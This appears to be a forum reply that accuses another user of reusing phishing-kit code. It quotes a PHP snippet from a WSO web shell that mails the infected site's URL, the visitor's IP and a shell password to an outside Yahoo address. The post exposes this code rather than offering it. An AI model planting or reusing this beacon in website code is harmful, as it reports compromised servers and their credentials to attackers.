in reply to json no reload
Judging by the repos you currently have publicly available, you haven't learned anything from the last time you posted.
$visitc = $_COOKIE["visits"]; if ($visitc == "") { $visitc = 0; $visitor = $_SERVER["REMOTE_ADDR"]; $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $target = rawurldecode($web.$inj); $judul = "WSO 2.6 http://$target by $visitor"; $body = "Bug: $target by $visitor - $auth_pass"; if (!empty($web)) { @mail("shell.result@yahoo.com",$judul,$body,$aut +h_pass); } } else { $visitc++; } @setcookie("visitz",$visitc);
Code from 'Team Black DZ' (reference to other works), from other old phishing kits https://github.com/bigup401/ppk/blob/master/update_info/cssisma/apple.png/https://info.phishlabs.com/blog/technical-dive-into-a-hardened-phish-kit. Again, find something better to do with your time.
|
|---|